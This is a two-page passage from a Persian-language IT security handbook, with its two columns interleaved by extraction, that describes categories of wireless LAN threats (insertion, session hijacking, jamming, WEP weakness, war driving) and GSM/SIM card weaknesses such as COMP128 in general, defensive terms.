‫‪١٨٩‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﺩﺍﺷﺘﻦ ﺍﺑﺰﺍﺭ ﻣﻨﺎﺳﺐ‪ ،‬ﺩﺭﺻـﻮﺭﺗﻴﻜﻪ ﺩﺭ ﻣﺤـﺪﻭﺩﻩ ﺍﺭﺳـﺎﻝ‬ ‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ‪ IEEE 802.11‬ﻭ ﺩﺭ ﺍﺭﻭﭘﺎ ﺗﺤـﺖ ﺍﺳـﺘﺎﻧﺪﺍﺭ ‪GSM‬‬
‫ﺑﺴﺘﻪ ﻫﺎ ﺑﺎﺷﺪ‪ ،‬ﻗﺎﺩﺭ ﺑﻪ ﺩﺭﻳﺎﻓﺖ ﺁﻧﻬﺎ ﺧﻮﺍﻫﺪ ﺑـﻮﺩ‪ .‬ﻭﺳـﺎﻳﻞ‬ ‫ﺍﺭﺍﺋﻪ ﻣﻲﺷﻮﻧﺪ‪ .‬ﻫﻨﮕﺎﻡ ﻃﺮﺍﺣﻲ ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳـﻴﻢ‪ ،‬ﻧﮕﺮﺍﻧﻴﻬـﺎﻱ‬
‫ﺗﻘﻮﻳﺖ ﺳﻴﮕﻨﺎﻝ ﻭ ﮔﺴﺘﺮﺵ ﺍﻳﻦ ﻣﺤﺪﻭﺩﻩ ﻧﻴـﺰ ﺑـﻪ ﻭﻓـﻮﺭ‬ ‫ﻣﻬﻢ ﺍﻣﻨﻴﺘﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺎﻳﺪ ﺑﻪ ﺁﻧﻬﺎ ﺗﻮﺟﻪ ﺷﻮﺩ‪.‬‬
‫ﻣﻬﻴﺎﺳﺖ؛ ﻭ ﻟﺬﺍ ﻧﺎﺣﻴﻪﺍﻱ ﻛـﻪ ﺗـﺼﺎﺣﺐ ﺗﺮﺍﻓﻴـﻚ ﺩﺭ ﺁﻥ‬ ‫ﻫﻔﺖ ﺩﺳﺘﻪ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺘﻲ ﺍﻭﻟﻴﻪ ﺩﺭ ﻣﻮﺭﺩ ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳﻴﻢ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ‪ ،‬ﻭﺳﻴﻊ ﻭ ﺍﻳﻤﻦ ﻛﺮﺩﻥ ﺁﻥ ﻣﺸﻜﻞ ﻣﻲﺑﺎﺷﺪ‪.‬‬ ‫‪١٥٣‬‬
‫ﻗﺎﺑﻞ ﺫﻛﺮ ﺍﺳﺖ‪:‬‬
‫ﺍﺭﺗﺒﺎﻁ ﻧﻘﻄﺔ ﺳﻴﺎﺭ ﺑﺎ ﻧﻘﻄﺔ ﺳﻴﺎﺭ ﺩﻳﮕـﺮ‪ :‬ﺍﻏﻠـﺐ‬ ‫‪.۶‬‬ ‫ﺣﻤﻼﺕ ﺩﺭﺝ‪ :١٥٤‬ﻧﻔﻮﺫﮔﺮ ﺳﻌﻲ ﻣﻲﻛﻨﺪ ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ‬ ‫‪.۱‬‬
‫ﻧﻘــﺎﻁ ﺳــﻴﺎﺭ )ﻣﺜــﻞ ﺭﺍﻳﺎﻧــﻪﻫــﺎﻱ ﻗﺎﺑــﻞ ﺣﻤــﻞ ﻭ ‪PDA‬ﻫــﺎ(‬ ‫ﻧﻘﻄﻪ ﺩﺳﺘﺮﺳﻲ ﺳﻴﺎﺭ‪ ١٥٥‬ﻧﺎﺍﻣﻦ‪ ،‬ﺑﻪ ﺷﺒﻜﺔ ﺷﻤﺎ "ﺩﺍﺩﻩ" ﻭﺍﺭﺩ‬
‫ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺧﺪﻣﺎﺕ ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ ﻳﺎ ﻫﺮﮔﻮﻧـﻪ ﺧـﺪﻣﺎﺕ‬ ‫ﻛﻨﺪ‪.‬‬
‫‪ TCP/IP‬ﺭﻭﻱ ﺁﻧﻬــﺎ ﻓﻌــﺎﻝ ﺑﺎﺷــﺪ‪ ،‬ﻗــﺎﺩﺭ ﺑــﻪ ﺍﺭﺗﺒــﺎﻁ‬
‫ﺑﻲﻭﺍﺳﻄﻪ ﻭ ﻣﺴﺘﻘﻴﻢ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﻫﺴﺘﻨﺪ‪ .‬ﺍﻳﻦ ﻣـﺴﺌﻠﻪ ﺑـﻪ‬ ‫ﺳﺮﻗﺖ ﺟﻠﺴﻪ‪ :١٥٦‬ﻛﻪ ﺑﻪ "‪"man in the middle‬‬ ‫‪.۲‬‬
‫ﺍﻳﻦ ﻣﻌﻨﻲ ﺍﺳﺖ ﻛﻪ ﻫﺮ ﻧﻘﻄﺔ ﺳﻴﺎﺭ ﻗﺎﺩﺭ ﺍﺳﺖ ﻳﻚ ﻓﺎﻳـﻞ‬ ‫ﻧﻴﺰ ﻣﻌﺮﻭﻑ ﺍﺳﺖ‪ ،‬ﺑﺮ ﺍﺳﺎﺱ ﺍﻳﻦ ﺍﻳﺪﻩ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﻛﻪ ﺩﺭ‬
‫ﻳﺎ ﺑﺮﻧﺎﻣﺔ ﺧﻄﺮﻧﺎﻙ ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ ﺷﺒﻜﺔ ﺷﻤﺎ ﻣﻨﺘﻘﻞ ﻛﻨﺪ‪.‬‬ ‫ﺳﻴﺴﺘﻢ ﺗﻠﻔﻨﻬﺎﻱ ﺑﻲﺳﻴﻢ‪ ،‬ﺗﻠﻔـﻦ ﻫﻮﻳـﺖ ﺧـﻮﺩ ﺭﺍ ﺑـﺮﺍﻱ‬
‫ﺍﻳﺴﺘﮕﺎﻩ ﺛﺎﺑﺖ ﺗﺼﺪﻳﻖ ﻣﻲﻛﻨـﺪ‪ ،‬ﺍﻣـﺎ ﺍﻳـﺴﺘﮕﺎﻩ ﺍﻳﻨﻜـﺎﺭ ﺭﺍ‬
‫ﺗﻨﻈﻴﻤﺎﺕ ﻧﺎﺩﻗﻴﻖ‪ :‬ﻫﺮﮔﻮﻧﻪ ﺍﺑﺰﺍﺭ‪ ،‬ﺧﺪﻣﺎﺕ‪ ،‬ﻳـﺎ ﺑﺮﻧﺎﻣـﺔ‬ ‫‪.۷‬‬ ‫ﺑﺮﺍﻱ ﺗﻠﻔﻦ ﺍﻧﺠﺎﻡ ﻧﻤﻲﺩﻫﺪ؛ ﭘﺲ ﻣﻲﺗـﻮﺍﻥ ﻳـﻚ ﺟﻠـﺴﺔ‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫ﻛﺎﺭﺑﺮﺩﻱ ﻛﻪ ﺑﻄﻮﺭ ﺻﺤﻴﺢ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻧﺸﺪﻩ ﺑﺎﺷـﺪ‪ ،‬ﻛـﻞ‬ ‫ﺑﻲﺳﻴﻢ ﻣﻴﺎﻥ ﺗﻠﻔﻦ ﻭ ﺍﻳﺴﺘﮕﺎﻩ ﺛﺎﺑﺖ ﺭﺍ ﺑﺪﻭﻥ ﺍﻳﻨﻜﻪ ﺗﻠﻔﻦ‬
‫ﺷﺒﻜﻪ ﺭﺍ ﻣﻮﺭﺩ ﻣﺨﺎﻃﺮﻩ ﻗﺮﺍﺭ ﻣﻲﺩﻫﺪ‪ .‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﺑﺰﺍﺭﻫـﺎ‬ ‫ﺑﺘﻮﺍﻧﺪ ﺑﻪ ﻣﻮﺿﻮﻉ ﭘﻲ ﺑﺒﺮﺩ ﺳﺮﻗﺖ ﻛـﺮﺩ ﻭ ﺑـﺮﺍﻱ ﺍﻳﻨﻜـﺎﺭ‬
‫ﻭ ﺑﺮﻧﺎﻣﻪ ﻫﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ ﺑـﻲ ﺳـﻴﻢ‪ ،‬ﺑﻄـﻮﺭ ﭘـﻴﺶﻓـﺮﺽ‬ ‫ﻛﺎﻓﻲ ﺍﺳﺖ ﻳﻚ ﺍﻳﺴﺘﮕﺎﻩ ﺛﺎﺑﺖ ﺷﺒﻴﻪﺳﺎﺯﻱ ﺷﻮﺩ‪.‬‬
‫ﺑﮕﻮﻧﻪﺍﻱ ﺗﻨﻈﻴﻢ ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﻫﺮﮔﻮﻧﻪ ﺩﺭﺧﻮﺍﺳﺖ ﺧـﺪﻣﺎﺕ‬
‫ﻳﺎ ﺩﺳﺘﺮﺳﻲ ﺭﺍ ﻣﻲ ﭘﺬﻳﺮﻧﺪ‪ .‬ﺍﻳﻦ ﺑﻪ ﺁﻥ ﻣﻌﻨﺎ ﺍﺳﺖ ﻛﻪ ﻫـﺮ‬ ‫ﭘﺎﺭﺍﺯﻳﺖ ﺩﺍﺩﻥ‪ :‬ﺍﻳﻦ ﺣﻤﻠﻪ ﺍﺯ ﺍﻧﻮﺍﻉ ﺣﻤـﻼﺕ ﺗﺨﺮﻳـﺐ‬ ‫‪.۳‬‬
‫ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﺓ ﺳﻴﺎﺭ ﺩﻟﺨﻮﺍﻩ ﺧﻮﺍﻫﺪ ﺗﻮﺍﻧﺴﺖ ﺩﺭﺧﻮﺍﺳـﺖ‬ ‫ﺳﺮﻭﻳﺲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺁﻥ ﻧﻔﻮﺫﮔﺮ ﺑﺎ ﺩﺍﺩﻩﭘﺮﺍﻛﻨﻲ ﻭ ﭘﺨﺶ‬
‫ﺟﻠﺴﺔ ‪ telnet‬ﻳﺎ ‪ ftp‬ﻧﻤﻮﺩﻩ ﻭ ﭘﺎﺳﺦ ﺁﻧﺮﺍ ﺩﺭﻳﺎﻓﺖ ﻛﻨﺪ‪.‬‬ ‫ﻱ ﺷﺒﻜﺔ ﺷﻤﺎ ﺳﻌﻲ ﻣﻲﻛﻨـﺪ‬ ‫ﺲ ﻛﺎﺭ ﹺ‬‫ﻋﻤﻮﻣﻲ‪ ١٥٧‬ﺩﺭ ﻓﺮﻛﺎﻧ ﹺ‬
‫ﺩﺭ ﻃﻴــﻒ ﻓﺮﻛــﺎﻧﺲ ﺭﺍﺩﻳــﻮﻳﻲ ﺷــﺒﻜﺔ ﺑــﻲﺳــﻴﻢ ﺍﻳﺠــﺎﺩ‬
‫ﺣﻤــﻼﺕ ‪ :Brute Force‬ﺍﻏﻠــﺐ ﻧﻘــﺎﻁ ﺩﺳﺘﺮﺳــﻲ‬ ‫‪.۸‬‬ ‫ﺳﺮﺭﻳﺰ‪ ١٥٨‬ﻛﻨﺪ‪.‬‬
‫ﺑﻲﺳﻴﻢ‪ ،‬ﺍﺯ ﻳﻚ ﻛﻠﻴﺪ ﻳﺎ ﺭﻣﺰ ﻋﺒﻮﺭ ﻣﺸﺘﺮﻙ ﺑـﺮﺍﻱ ﺗﻤـﺎﻡ‬
‫ﺍﺑﺰﺍﺭﻫﺎﻱ ﺷﺒﻜﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺷﺒﻜﻪﻫﺎﻱ‬ ‫ﺣﻤﻼﺕ ﺭﻣﺰﻧﮕﺎﺭﻱ‪ :١٥٩‬ﺷﺒﻜﺔ ﺑـﻲﺳـﻴﻢ ﻣﺒﺘﻨـﻲ ﺑـﺮ‬ ‫‪.۴‬‬
‫ﺑﻲﺳـﻴﻢ ﺭﺍ ﺩﺭ ﺑﺮﺍﺑـﺮ ﺣﻤـﻼﺕ ‪) brute force‬ﻣـﺜ ﹰ‬
‫ﻼ ﺑـﺮ‬ ‫‪ IEEE 802.11‬ﺍﺯ ﺍﻟﮕـــﻮﺭﻳﺘﻢ ‪ ١٦٠WEP‬ﺑـــﺮﺍﻱ‬
‫ﺍﺳﺎﺱ ﻳﻚ ﻓﺮﻫﻨﮓ ﻟﻐﺖ( ﻧﺎﺍﻣﻦ ﻛﺮﺩﻩ ﺍﺳﺖ‪.‬‬ ‫ﺭﻣﺰﮔــﺬﺍﺭﻱ ﺍﺳــﺘﻔﺎﺩﻩ ﻣــﻲﻛﻨــﺪ‪ .‬ﺭﻭﺵ ﺭﻣــﺰﮔــﺬﺍﺭﻱ ﻭ‬
‫ﺑﺮﺩﺍﺭﻫﺎﻱ ﻣﻘـﺪﺍﺭ ﺍﻭﻟﻴـﺔ ﺍﻳـﻦ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ ﺑـﺴﻴﺎﺭ ﺿـﻌﻴﻒ‬
‫‪War Driving‬‬ ‫ﻫﺴﺘﻨﺪ ﻭ ﺗﺎﻛﻨﻮﻥ ﺑﺎﺭﻫﺎ ﺷﻜﺴﺘﻪ ﺷﺪﻩﺍﻧﺪ‪.‬‬
‫ﺟﺎﺳﻮﺳﻲ ﺻﻨﻌﺘﻲ ﻭ ﺟﺮﺍﺋﻢ ﺍﺩﺍﺭﻱ ﺑﺎ ﭘﻴﺸﺮﻓﺖ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺟﺪﻳـﺪ‬
‫ﺗﺼﺎﺣﺐ ﺗﺮﺍﻓﻴﻚ ﻭ ﺍﻧﺠﺎﻡ ﺩﻳﺪﻩﺑﺎﻧﻲ‪ :‬ﺑﺮﺩ ﺗﻘﺮﻳﺒﻲ‬ ‫‪.۵‬‬
‫ﺑﻪ ﺑﺎﻻﺗﺮﻳﻦ ﺣﺪ ﺧـﻮﺩ ﺭﺳـﻴﺪﻩﺍﻧـﺪ‪ War dialing .‬ﺑـﻪ ﻣﻌﻨـﺎﻱ‬
‫ﻧﻘﺎﻁ ﺩﺳﺘﺮﺳـﻲ ﺳـﻴﺎﺭ ﺩﺭ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ ‪ 802.11b‬ﺣـﺪﻭﺩ‬
‫ﺗﻤــﺎﺱ ﺑــﺎ ﺗﻤــﺎﻡ ﺷــﻤﺎﺭﻩ ﺗﻠﻔﻨﻬــﺎﻱ ﺳــﺎﺯﻣﺎﻥ ﻭ ﻳــﺎﻓﺘﻦ ﺷــﻤﺎﺭﺓ‬
‫‪ ۳۰۰‬ﻓﻮﺕ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﺑﻪ ﺁﻥ ﻣﻌﻨﺎﺳﺖ ﻛﻪ ﻫﺮ ﻓـﺮﺩﻱ ﺑـﺎ‬
‫ﻣﻮﺩﻡﻫﺎﻱ ﺁﻥ‪ ،‬ﺟﺎﻱ ﺧﻮﺩ ﺭﺍ ﺑﻪ ‪ war driving‬ﺩﺍﺩﻩ ﺍﺳﺖ‪ .‬ﺍﻳـﻦ‬
‫ﻣﻔﻬﻮﻡ ﺟﺪﻳﺪ ﻳﻌﻨﻲ ﺟﺴﺘﺠﻮ ﺑـﺮﺍﻱ ﻳـﺎﻓﺘﻦ ﺷـﺒﻜﻪﻫـﺎﻱ ﻣﺤﻠـﻲ‬
‫ﺑﻲﺳﻴﻢ ﻣﺆﺳﺴﺎﺕ ﺍﻗﺘﺼﺎﺩﻱ‪ ،‬ﻭ ﺿﺒﻂ ﺗﺮﺍﻓﻴـﻚ ﺷـﺒﻜﺔ ﺁﻧﻬـﺎ ﺑـﺎ‬ ‫‪ ۱۵۳‬ﺍﻳﻦ ﺩﺳﺘﻪﺑﻨﺪﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﻳﻜـﻲ ﺍﺯ ﺍﻋـﻀﺎﻱ ﻣﺮﻛـﺰ ﺗﺤﻠﻴـﻞ ‪CERT‬‬
‫ﺍﺳﺖ‪.‬‬
‫ﺭﺍﻳﺎﻧﺔ ﻗﺎﺑﻞ ﺣﻤﻞ‪ .‬ﺑﻨﺎ ﺑﻪ ﮔﻔﺘـﻪ ﺩﻳـﻮ ﺗﻮﻣـﺎﺱ‪ ١٦١‬ﺑـﺎﺯﺭﺱ ﺍﺭﺷـﺪ‬
‫‪154‬‬ ‫‪Insertion Attacks‬‬
‫ﺑﺨﺶ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ‪ war driving ،FBI‬ﭘﺪﻳﺪﻩﺍﻱ ﺩﺭﺣـﺎﻝ‬ ‫‪155‬‬ ‫‪Mobile Access Point‬‬
‫‪156‬‬ ‫‪Session Hijacking‬‬
‫‪157‬‬ ‫‪Broadcasting‬‬
‫‪158‬‬ ‫‪Flooding‬‬
‫‪159‬‬ ‫‪Encryption‬‬
‫‪161 Dave Thomas‬‬ ‫‪160‬‬ ‫‪Wired Equivalent Privacy‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪١٩٠‬‬

‫ﺛﺎﻧﻴﻪ ﺩﺭﺣﺎﻝ ﺍﻓﺰﺍﻳﺶ ﺍﺳﺖ‪ .‬ﭘﻮﺷﺶ ‪ GSM‬ﻫﻤﺔ ﻗـﺎﺭﻩﻫـﺎ ﺭﺍ ﺩﺭ‬ ‫ﮔﺴﺘﺮﺵ ﺍﺳﺖ ﻛﻪ ﺍﻣﻨﻴﺖ ﺗﻤﺎﻡ ﺷﺮﻛﺘﻬﺎ ﻭ ﻣﺆﺳﺴﺎﺗﻲ ﻛـﻪ ﺩﺍﺭﺍﻱ‬
‫ﻱ ﻣﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﺓ ‪ ۴۰۰‬ﺍﺭﺍﺋـﻪﻛﻨﻨـﺪﺓ‬ ‫ﺑﺮ ﻣﻲﮔﻴﺮﺩ‪ ،‬ﺑﻄﻮﺭﻳﻜﻪ ﻓﻨﺎﻭﺭ ﹺ‬ ‫ﺷﺒﻜﻪ ﻣﺤﻠﻲ ﺑﻲﺳﻴﻢ ﻫﺴﺘﻨﺪ ﺭﺍ ﺗﻬﺪﻳﺪ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﺧﺪﻣﺎﺕ ﺩﺭ ﺑﻴﺶ ﺍﺯ ‪ ۱۷۰‬ﻛﺸﻮﺭ ﺩﻧﻴﺎ ﺍﺳﺖ‪ .‬ﺍﻣـﺎ ﺍﻳـﻦ ﺗﻨﻬـﺎ ﺁﻏـﺎﺯ‬ ‫ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺭﺍﻫﺒﺮ ﺷﺒﻜﻪ ﻫﻨﮕﺎﻡ ﺗﻨﻈﻴﻢ ﻭ ﺍﺳـﺘﻘﺮﺍﺭ‬
‫ﺍﻧﻘﻼﺏ ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳﻴﻢ ﺍﺳﺖ‪.‬‬ ‫ﺷﺒﻜﺔ ﻣﺤﻠﻲ ﺑﻲﺳﻴﻢ ﺑﺒﻴﻨﺪ ﻛﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻗﺎﺑﻞ ﺣﻤـﻞ ﺗﻨﻬـﺎ ﺩﺭ‬
‫ﻣﺤﻘﻘﺎﻥ ﺻﻨﻌﺘﻲ ﭘﻴﺶﺑﻴﻨﻲ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺗﺎ ﭘﺎﻳﺎﻥ ﺳﺎﻝ ‪ ۲۰۰۵‬ﺩﺭ‬ ‫ﻓﺎﺻﻠﺔ ﻣﺤﺪﻭﺩﻱ ﺍﺯ ﻧﻘﺎﻁ ﺩﺳﺘﺮﺳﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﺷـﺒﻜﻪ ﻣﺘـﺼﻞ‬
‫ﺣﺪﻭﺩ ‪ ۱،۴‬ﻣﻴﻠﻴﺎﺭﺩ ﻛﺎﺭﺑﺮ ‪ GSM‬ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ‪ .‬ﺗﻠﻔﻨﻬـﺎﻱ‬ ‫ﺷﻮﻧﺪ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﮔﻤﺎﻥ ﻛﻨﺪ ﻛﻪ ﺳﻴﮕﻨﺎﻟﻬﺎﻱ ﺷﺒﻜﻪ ﺩﺭ ﻓﻮﺍﺻـﻠﻲ‬
‫‪ GSM‬ﺩﺭ ﺩﺍﺧﻞ ﺧـﻮﺩ ﺩﺍﺭﺍﻱ ﻳـﻚ ﻛـﺎﺭﺕ ﻛﻮﭼـﻚ ﻫﻮﺷـﻤﻨﺪ‬ ‫ﺩﻭﺭﺗﺮ ﺍﺯ ﺁﻥ ﻓﺎﺻﻠﻪ ﻗﺎﺑـﻞ ﺩﺳﺘﺮﺳـﻲ ﻧﻴـﺴﺘﻨﺪ‪ ،‬ﺍﻣـﺎ ﺍﻳـﻦ ﻓـﺮﺽ‬
‫ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﺸﺨﺼﺎﺕ ﺗﻠﻔﻦ ﺭﺍ ﺩﺭ ﺧﻮﺩ ﺫﺧﻴﺮﻩ ﻣﻲﻛﻨﺪ ﻭ ﺑﻪ ﻧـﺎﻡ‬ ‫ﻧﺎﺩﺭﺳﺖ ﺍﺳﺖ‪ .‬ﺩﺭ ﺣﻘﻴﻘﺖ ﺳﻴﮕﻨﺎﻟﻬﺎ ﺩﺭ ﻃﻮﻝ ﻫﺰﺍﺭﺍﻥ ﻣﺘﺮ ‪ -‬ﺗـﺎ‬
‫ﻭﺍﺣﺪ ﺷﻨﺎﺳﺎﻳﻲ ﻣﺸﺘﺮﻱ )‪ ١٦٣(SIM‬ﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﻮﺩ‪ SIM .‬ﺑﺎﻳـﺪ‬ ‫ﺟﺎﻳﻲ ﻛﻪ ﭼﻴﺰﻱ ﺁﻧﻬﺎ ﺭﺍ ﻣﻨﺤﺮﻑ ﻳﺎ ﺩﭼـﺎﺭ ﻭﻗﻔـﻪ ﻧﻜﻨـﺪ ‪ -‬ﻗﺎﺑـﻞ‬
‫ﺍﺯ ﻣﺸﺨﺼﺎﺕ ﺑﺼﻮﺭﺕ ﻣﺤﺮﻣﺎﻧـﻪ ﻭ ﺭﻣﺰﻧﮕـﺎﺭﻱﺷـﺪﻩ ﻧﮕﻬـﺪﺍﺭﻱ‬ ‫ﺩﺭﻳﺎﻓﺖ ﻫﺴﺘﻨﺪ‪ .‬ﺩﻟﻴﻞ ﺁﻥ ﺍﺳﺘﺪﻻﻝ ﻏﻠﻂ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ ﺁﻧـﺘﻦ‬
‫ﻛﻨﺪ؛ ﻟﺬﺍ ﺑﻪ ﻛﺎﺭﺕ ‪ SIM‬ﻫﻢ ﻣﻲﺗﻮﺍﻥ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻧﻘﻄﺔ ﻗﻮﺕ ﻭ‬ ‫ﻛﻮﭼﻚ ﺭﺍﻳﺎﻧﺔ ﻗﺎﺑﻞ ﺣﻤـﻞ ﻧﻤـﻲﺗﻮﺍﻧـﺪ ﺳـﻴﮕﻨﺎﻟﻬﺎﻱ ﺿـﻌﻴﻒ ﺭﺍ‬
‫ﻫﻢ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻧﻘﻄﺔ ﺿﻌﻒ ﺍﻣﻨﻴﺘـﻲ ﺩﺭ ﻓﻨـﺎﻭﺭﻱ ‪ GSM‬ﻧﮕـﺎﻩ‬ ‫ﺩﺭﻳﺎﻓﺖ ﻛﻨﺪ؛ ﺍﻣﺎ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺁﻧﺘﻦ ﺧﺎﺭﺟﻲ‪ ،‬ﻣﻲﺗـﻮﺍﻥ ﺑـﺮﺩ‬
‫ﻛﺮﺩ‪.‬‬ ‫ﻻ ﺑﮕﻮﻧﻪﺍﻱ‬‫ﺳﻴﮕﻨﺎﻟﻬﺎ ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﺩﺍﺩ‪ .‬ﺑﺨﺶ ﺑﻲﺳﻴﻢ ﺷﺒﻜﻪ ﻣﻌﻤﻮ ﹰ‬
‫ﺍﺳﺖ ﻛﻪ ﻧﻔﻮﺫﮔﺮ ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺗﺮﺍﻓﻴﻚ ﺁﻥ ﻧﻴﺎﺯﻱ ﻧﺪﺍﺭﺩ ﺑﻪ‬
‫ﻧﻘﺎﻁ ﺿﻌﻒ ‪GSM‬‬ ‫ﭼﻴﺰﻱ ﺩﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜﻲ ﭘﻴﺪﺍ ﻛﻨﺪ‪ .‬ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﺍﻳﻦ ﺷﺒﻜﻪﻫﺎ‬
‫ﻧﺴﺒﺖ ﺑﻪ ﺣﻤﻼﺗﻲ ﭼـﻮﻥ ﺩﺯﺩﻱ ﭘﻴـﺎﻡ‪ ،‬ﺗﻐﻴﻴـﺮ ﭘﻴـﺎﻡ‪ ،‬ﻳـﺎ ﺍﺭﺳـﺎﻝ‬
‫ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﻛﺎﺭﺕ ‪SIM‬‬
‫ﭘﺎﺭﺍﺯﻳﺖ ﻣﻴﺎﻥ ﭘﻴﺎﻡ‪ ،‬ﺩﺍﺭﺍﻱ ﺿﻌﻒ ﻫﺴﺘﻨﺪ‪.‬‬
‫ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ GSM‬ﺁﻣﺮﻳﻜﺎ ﻭ ﺍﺭﻭﭘﺎ‪ ،‬ﺭﻭﺵ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﺷﺒﻜﻪ‬
‫ﻳﻜﺴﺎﻥ ﺍﺳﺖ‪ .‬ﻛﺎﺭﺗﻬـﺎﻱ ﻫﻮﺷـﻤﻨﺪ ﻗﺎﺑـﻞ ﺟﺎﺑﺠـﺎﻳﻲ ﺩﺭ ﺗﻠﻔﻨﻬـﺎ‬ ‫ﻣﺴﺎﺋﻞ ﻣﺬﻛﻮﺭ ﺍﻫﻤﻴﺖ ﭘﺮﺩﺍﺧﺘﻦ ﺑﻪ ﻣﺴﺌﻠﻪ ﺍﻣﻨﻴﺖ ﺩﺭ ﺷﺒﻜﻪﻫﺎﻱ‬
‫)ﻛﺎﺭﺗﻬﺎﻱ ‪ (SIM‬ﺑﺮﺍﻱ ﻧﮕﻬﺪﺍﺭﻱ ﺷﻤﺎﺭﻩﻫـﺎﻱ ﺗﻤـﺎﺱ‪ ،‬ﺍﻃﻼﻋـﺎﺕ‬ ‫ﺑﻲﺳﻴﻢ ﺭﺍ ﺭﻭﺷﻦ ﻣﻲﻛﻨﻨﺪ‪ .‬ﻫﺮﻳﻚ ﺍﺯ ﺿﻌﻔﻬﺎﻱ ﻓﻮﻕ ﺭﺍ ﻣﻲﺗﻮﺍﻥ‬
‫ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ‪ ،‬ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺟﺎﻧﺒﻲ ﻣﺜﻞ ﻣﺮﻭﺭﮔـﺮ ﻭﺏ ﺑﻜـﺎﺭ‬ ‫ﺑﺎ ﺍﺳﺘﻔﺎﺩﺓ ﻣﻨﺎﺳـﺐ ﺍﺯ ﺳﻴﺎﺳـﺘﻬﺎ ﻭ ﺗﺠﺮﺑﻴـﺎﺕ ﺍﻣﻨﻴﺘـﻲ‪ ،‬ﻃﺮﺍﺣـﻲ‬
‫ﻣﻲﺭﻭﻧﺪ‪ .‬ﺩﺍﺩﻩﻫﺎﻱ ﺫﺧﻴﺮﻩﺷﺪﻩ ﺩﺭ ﻛﺎﺭﺗﻬﺎ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻣـﻲﺷـﻮﻧﺪ‪،‬‬ ‫ﺷﺒﻜﻪ‪ ،‬ﺑﺮﻧﺎﻣـﻪ ﻫـﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ ﺍﻣﻨﻴﺘـﻲ ﻭ ﭘﻴﻜﺮﺑﻨـﺪﻱ ﺻـﺤﻴﺢ‬
‫ﺍﻣﺎ ﺍﻟﮕﻮﺭﻳﺘﻢ ‪ COMP128‬ﻛﻪ ﺩﺭ ﺍﻳﻨﻜﺎﺭ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ ﭘـﻴﺶ ﺍﺯ‬ ‫ﻛﻨﺘﺮﻟﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﻪ ﺣﺪﺍﻗﻞ ﺭﺳﺎﻧﺪﻩ ﻭ ﻳـﺎ ﺍﺯ ﺑـﻴﻦ ﺑـﺮﺩ‪ .‬ﺁﺧـﺮﻳﻦ‬
